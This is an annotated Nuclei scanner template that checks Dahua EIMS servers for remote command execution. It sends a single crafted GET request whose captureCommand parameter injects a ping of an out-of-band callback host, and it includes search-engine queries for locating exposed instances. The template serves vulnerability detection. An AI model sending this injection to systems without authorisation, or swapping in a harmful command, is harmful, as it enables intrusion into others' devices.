nuclei-templates/http/vulnerabilities/dahua/dahua-eims-rce.yaml


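# Nuclei HTTP template: checks a Dahua EIMS instance for command execution
# through the capture_handle.action endpoint. One GET request is sent; a hit
# needs both an out-of-band DNS callback and an in-band "success" body.
id: dahua-eims-rce

info:
  name: Dahua EIMS - Remote Command Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    Dahua EIMS capture_handle interface allows remote command execution.
  # NOTE(review): no affected versions, advisory identifier or remediation are
  # given in this template; confirm them against the references before a
  # finding is reported or tracked.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://cn-sec.com/archives/2554372.html
  metadata:
    verified: true
    # Matches the single entry under http[0].path.
    max-request: 1
    fofa-query: "<title>eims</title>"
    # Quoted so the embedded double quotes and colon stay one string value.
    zoomeye-query: 'app:"大华 EIMS"'
  tags: dahua,rce,eims

http:
  - method: GET
    # captureCommand carries a ping of the OAST hostname, so the observable
    # the template relies on is a DNS lookup of {{interactsh-url}}.
    # For detection: both .action path segments and the captureCommand query
    # parameter appear verbatim in the request line, which makes them usable
    # indicators in web access logs and WAF rules.
    path:
      - "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"

    # Both matchers must hold. A DNS callback alone can come from any
    # component that resolves hostnames seen in a request, so the body check
    # is what ties the callback to this endpoint's response.
    matchers-condition: and
    matchers:
      # Out-of-band confirmation: the OAST server saw a DNS interaction.
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      # In-band confirmation. `part: body` is the default for this matcher
      # and is spelled out here only for readability.
      # NOTE(review): without the (?m) flag, ^ and $ anchor the whole body, so
      # a response with a trailing newline or extra markup will not match.
      # Looks intentional given `verified: true`; confirm on a known instance.
      - type: regex
        part: body
        regex:
          - "^success$"

# NOTE(review): the digest below is the upstream signature for the template
# as originally published. It presumably does not verify for this
# re-indented, annotated copy; re-sign (nuclei -sign) before relying on
# signature verification.
# digest: 4a0a0047304502204c8e8f930bb56dc18e15d1246becf227edebef661a92d5db320afc11a1e290030221009c3b72f6ae1afe50d28e4b1bfbc6190ab68dcf37cd5e89f8f7006f19d4f889e1:922c64590222798bb761d5b6d8e72950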